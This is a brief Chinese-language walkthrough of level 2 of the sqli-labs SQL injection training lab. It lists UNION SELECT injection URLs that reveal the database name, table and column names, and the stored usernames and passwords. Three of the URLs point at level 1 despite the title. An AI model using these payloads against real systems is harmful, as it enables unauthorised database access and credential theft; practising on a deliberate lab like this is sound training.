Java教程

sql整数型注入-sqli第2关

本文主要是介绍sql整数型注入-sqli第2关,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

第二关注入语法


http://sqli/less-1/?id=0 union select 111,222,database() -- - 
爆当前使用的数据库名
http://sqli/less-1/?id=0 union select 111,222,group_concat(table_name) from information_schema.tables where table_schema = 'security'  -- -
爆数据库的表名
http://sqli/less-1/?id=0 union select 111,222,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'  -- -
爆users表中的字段信息
http://sqli/Less-2/?id=0 union select 111,group_concat(username),group_concat(password) from security.users -- -
爆users表中的信息
这篇关于sql整数型注入-sqli第2关的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!